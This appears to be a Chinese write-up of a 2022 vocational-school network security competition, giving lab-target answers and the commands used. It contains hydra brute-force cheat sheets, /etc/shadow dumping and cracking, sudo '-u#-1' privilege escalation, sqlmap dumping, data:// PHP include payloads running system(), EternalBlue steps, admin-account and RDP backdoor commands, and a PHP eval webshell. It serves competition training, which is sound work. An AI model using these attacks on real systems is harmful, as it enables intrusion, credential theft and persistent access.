2022淮安市第十七届职业学校技能大赛网络安全题解WP
任务一:服务器内部信息获取
任务环境说明:
- 服务器场景:Server210510(关闭链接)
- 服务器场景操作系统:Linux
- 用户名:test密码:123456
- 收集服务器场景中的服务信息。并获取服务器中开放的端口号信息,将服务器端口号作为flag提交(如果有多个端口以;分割,如11;22;33);
这题 没要求版本号,只要求端口号,可以用-sS, 要全面再加上-p-
nmap -p- -sS
Flag[22;111;6000]
2、将服务器中tmp文件夹下的字典下载至本地,并将字典中最后一位用户名作为flag提交;
Flag[BqMkbn]
3、应用工具获取服务器中黑客账户的密码。并将黑客的密码作为flag提交;
Flag[xhm9NG]
4、在服务器中查看sudo软件的版本,将sudo的版本号作为flag提交;
Flag[1.8.23]
5、在服务器中登录恶意用户,查看恶意用户在服务器中输入的第一条指令,将指令作为flag提交;
先对恶意用户进行爆破
可以使用hydra更快一点
1) 使用字典对目标服务进行破解。
hydra -L users.txt -P password.txt ssh://127.0.0.1
2) 当目标服务开放的端口不是默认端口时,使用 -s 进行指定。
hydra -L user.txt -P password.txt ssh://127.0.0.1 -s 77744
3)将破解的密码存储到指定文件。
hydra -L users.txt -P password.txt ssh://127.0.0.1 -s 40 -o ssh.txt
hydra破解不同协议的密码
#破解ssh: hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
#破解https: hydra -m /index.php -l username -P pass.txt IP https
#破解teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
#破解cisco: hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 127.0.0.1 cisco-enable
#破解smb: hydra -l administrator -P pass.txt IP smb
#破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3
#破解rdp: hydra IP rdp -l administrator -P pass.txt -V
#破解http-proxy: hydra -l admin -P pass.txt http-proxy://127.0.0.1
#破解telnet: hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
#破解ftp: hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
#get方式提交,破解web登录:
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php
这题可以用:
hydra 靶机地址 -l用户 -P 字典 -s 端口 服务
这里我使用的是msf中的ssh_login爆破模块
查看第一条指令:history
Flag[whoami]
6、在服务器中查看用户信息,将最后一个用户的用户名作为flag提交;
使用恶意用户打开文件
查看用户信息:cat /etc/shadow
Flag[Stand_by_me]
任务二:网站渗透测试
任务环境说明:
- 服务器场景:Server2100(关闭链接)
- 服务器场景操作系统:未知
- 用户名:未知 密码:未知
收集服务器场景中的服务信息。并获取服务器中开放的端口号信息,将服务器网站端口号作为flag提交;
使用nmap扫描发现网页端口是8081
Flag[8081]
- 扫描服务器网站路径,在网站路径下找到flag页面,将flag提交;
使用dirbuster进行目录扫描
目录为/usr/share/dirbuster/wordlist
扫描出目录evl.php
尝试输入127.0.0.1|ls 找到flag
flag=4ddyMING8sVRYMQ
2、在服务器网站中找到危险网页,并将网页标题中的flag值提交;
并发现危险目录command
直接查看源码找到flag
Flag[flag:Windows_Command_Prompt]
3、在网站中获取flag网页的拥有者和拥有组,并将拥有组作为flag提交;
注入命令127.0.0.1|ls -l
Flag[6TU9t3Sic8K1h3]
4、在网站中,打开flag页面查看内容,并将内容作为flag提交;
输入|ls-l发现没有权限进行赋权
127.0.0.1| chmod 777 [flag文件名]
flag[SgU5CZVcr6]
5、使用apache自带压力测试工具对服务器网站根目录测试,将服务器网站中回显信息的文件数值长度作为flag提交;
对服务器为进行压力测试
ab -n 100 -c 10 http://靶机地址:端口/
解读:使用ab压力测试工具 -n 发送100次请求 -c模拟10个用户
Flag[4897 bytes]
任务四:Linux系统渗透提权
任务环境说明:
- 服务器场景:Server2204(关闭链接)
- 用户名:hacker 密码:123456
sudo
- 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
使用nmap进行扫描发现ssh端口为2283
nmap -sV -p- -O
Flag[2283]
2、使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
直接ssh登录
hostname
Flag[KipZ1eze]
3、使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
uname -r查看版本号
Flag[2.6.32-642.el6.x86_64]
4、使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
使用sudo提权
sudo -u#-1 ls -l /root
找到文件直接cat
sudo -u#-1 cat /root/key.txt
Flag[7QcSI8kK]
5、使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;
继续使用sudo拿到root的hash值
sudo -u#-1 cat /etc/shadow
拿到hash值后返回kali使用john进行解密
注:需要先放到文本里面
echo 'hash值'>文件名
在使用john进行解密
john 文件名
Flag[Woodrow]
6、使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
拿到root账号密码了就可以自由发挥了
思路:可以用Windows7中的winscp进行登录获取文件
Flag[]
任务五:Web渗透测试
任务环境说明:
- 服务器场景:Server2103(关闭链接)
- 服务器场景操作系统:未知
HTTP 前台 sqlmap
进行扒库
使用sqlmap
找到注入点
sqlmap -u "注入点网址" --batch
获取基本信息
--dbs获取所有的数据库名
sqlmap -u "注入点网址" --dbs --batch
--current-db获取当前数据库用户
sqlmap -u "注入点网址" --current-db --batch
--current-user获取当前数据库用户
sqlmap -u "注入点网址" --current-user –batch
--is-dba检测DBMS当前用户是否DBA
sqlmap -u "注入点网址" --is-dba –batch
使用-D指定数据库,使用--tables获取指定数据库的所有表
sqlmap -u "注入点网址" -D cimer --tables --batch
使用-T指定表,使用--columns获取指定表的所有字段
sqlmap -u "注入点网址" -D cimer -T admin --columns --batch
使用-C指定字段,使用--dump获取指定字段的所有值
sqlmap -u "注入点网址" -D cimer -T admin -C username,password --dump --batch
目的拿到后台登陆界面账号密码进行文件上传
思路:可以上传图片马
也可以直接进行远程执行
- 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,将文件上传成功后的页面回显字符串作为Flag提交(如:点击超链接查看上传文件)
先在输入框中|ls查看后台
找到后台使用爆出的账号密码登录并上传文件得到flag
Flag[文件上传成功, 点击预览]
2、通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用WHOAMI获取WEB当前的用户权限,并作为Flag进行提交;
远程执行: https://172.16.101.250/system_wws/include.php?file=data://text/plain,<?php system("whoami");?>
Flag[]
3、通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令获取到当前linux用户UID为5的用户,将该用户的用户名称作为Flag进行提交;
远程执行:
https://172.16.101.250/system_wws/include.php?file=data://text/plain,<?php system("cat /etc/passwd");?>
Flag[]
4.通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令查看后台首页文件,将该文件的第二行的所有字符串作为Flag进行提交;
远程执行:
https://172.16.101.250/system_wws/include.php?file=data://text/plain,<?php system("cat /var/www/html/houtai/index.php");?>
https://172.16.101.250/system_wws/include.php?file=data://text/plain,%3C?php%20system(%22cat%20%20/var/www/html/houtai/index.php%22);?%3E
Flag[]
混战:
对于windows
攻击:
msf中ms17_010永恒之蓝(手速要快)
进入meterpreter
提权
输入:getuid(拿到“SYSTEM ”权限)
shell,进入dos命令下,进入后再在输入:chcp 65001(取消乱码)
添加管理员用户
方法一:
run getgui -u user1 -p 123 #添加用户
方法二:
set CMD cmd.exe /c net user hacker 123456 /add 添加用户
set CMD cmd.exe /c net localgroup administrators hacker /add 将hacker用户加至管理员组
如果没有开启远程桌面:
开启远程桌面:meterpreter > run post/windows/manage/enable_rdp
run getgui -e #开启远程桌面
set CMD cmd.exe /c REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\” \”Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开启远程桌面
加固:
第一种:
以管理员身份进入cmd关闭rdr、srv、netbt服务
下面的cmd命令比较暴力(会导致网络问题),谨慎使用:
net stop srv /y
sc config srv start= disabled
net stop rdr /y
net stop netbt /y
第二种:
找到server服务进行停止
对于Linux
攻击:
不建议:进行密码爆破
推荐:
可以进行web渗透获取靶机权限
文件上传
传一句话木马
<?php @eval($_POST['cmd'])?>
加固:
菜刀进去之后直接删除web页面
2022淮安市第十七届职业学校技能大赛网络安全题解WP相关推荐
- 晋中市中等职业学校技能大赛
简介 晋中市中等职业学校技能大赛由由晋中市教育局.晋中市人力资源和社会保障局主办. 历届 届数 年份 时间 地点 备注 第十四届 2022 9月28日-9月30日 平遥现代工程技术学校 第十三届 20 ...
- 山西省第十届计算机技能大赛,《附件2山西省第十届职业院校技能大赛比赛方案》.doc...
<附件2山西省第十届职业院校技能大赛比赛方案>.doc 附件2: ??? 一.大赛名称:山西省第届职业院校技能大赛 ??? 二.比赛时间:201年月??? 三.比赛地点:四.主办和承办单位 ...
- 山西省第十届计算机技能大赛,附件2山西省第十届职业院校技能大赛比赛方案.doc...
附件2山西省第十届职业院校技能大赛比赛方案.doc 附件2: ??? 一.大赛名称:山西省第届职业院校技能大赛 ??? 二.比赛时间:201年月??? 三.比赛地点:四.主办和承办单位: 主办单位:山 ...
- 计算机硬件人员专业知识技能,2017年江苏省职业学校技能大赛(计算机硬件)竞赛实施方案...
2017年江苏省职业学校技能大赛 信息技术类项目竞赛实施方案 计算机硬件检测项目 1.理论知识部分 模拟及数字电路基础.台式机主板电路工作原理.维修工具及使用知识. 数据恢复技术(包括数制.数据结构基 ...
- 2016江苏省盗取计算机技术,2016年江苏省职业学校技能大赛物联网技术应用与维护公开题库...
内容简介: 2016年江苏省职业学校技能大赛物联网技术应用与维护公开题库 [0001-07441101-5058ad5c][判断题][易][物联网概论][正确] 1.( )可控性能够控制与限定网络用户 ...
- 星光计划计算机,上海星光计划第七届职业院校技能大赛.PDF
上海市"星光计划" 第七届职业院校技能大赛 数字影视后期制作 决赛方案 上海市星光计划组委会竞赛办公室 二○一六年十二月 目 录 1. 简介 1 1.1 项目名称 1 数字影音 ...
- 江苏省有JAVA技能大赛,江苏省职业学校技能大赛组委会
江苏省职业学校技能大赛组委会 2011年第五号公告 现将部分专业相关要求公告如下: 一.农业类: 1.种子质量检测项目操作技能所用天平原为托盘天平现改为电子天平,型号为SE602F. 2.园林植物修剪 ...
- 2023年武汉市中等职业学校技能大赛 “网络搭建与应用”
2023年武汉市中等职业学校技能大赛 "网络搭建与应用" 一.竞赛内容分布 "网络搭建及应用"竞赛共分二个部分,其中: 第一部分:企业网络搭建部署项目,占总分的 ...
- 2022-2023年度江苏省职业院校技能大赛“网络安全”赛项中职组圆满成功
2022-2023年度江苏省职业院校技能大赛"网络安全"赛项中职组圆满成功!
最新文章
- pandas KeyError [‘1‘] not found in axis 错误的解决方法
- python列表字典操作_Python 列表(list)、字典(dict)、字符串(string)常用基本操作小结...
- ubuntu 进入 recovery mode
- python自定义类如何定义向量的模_gensim的word2vec如何得出词向量(python)
- python json.loads()中文问题-解决Python下json.loads()中文字符出错的问题
- centos7中安装JDK8-281版本
- MVC中使用Entity Framework 基于方法的查询学习笔记 (二)
- 前端学习(3266):js中this的指向
- 一个男生写的关于怎么追女生昨天没有说一个很关键的东西
- 【R】数据框data.frame的基本操作【1】
- python学习第21天
- 计算机系统动态库修复,xp系统恢复dll动态链接库的修复步骤
- 全国地址SQL数据文件(精确到区县)
- searchbar.wxss源代码
- Forth语言简明教程
- GitHub官网访问慢的解决问题
- python 经纬度计算相关
- QQ如何开通在线客服
- 如何选择最适合自己的地图软件
- js判断当前设备和获取设备、浏览器宽高
热门文章
- Failed to load the native TensorFlow runtime : error while importing tensorflow ——问题解决
- linux cpio grub 参数,Linux 备份压缩 : cpio 命令详解
- Redis缓存穿透-热点缓存并发重建-缓存与数据库双写不一致-缓存雪崩
- CSS border-radius 新玩法(含可视化生成工具)
- js中的闭包问题(持续更新)
- JVM学习笔记——class文件结构
- java PropertyDescriptor分析
- qrcodejs二维码
- 现代民机“飞行管理系统(FMS)”的功能和组成
- void* 指针赋值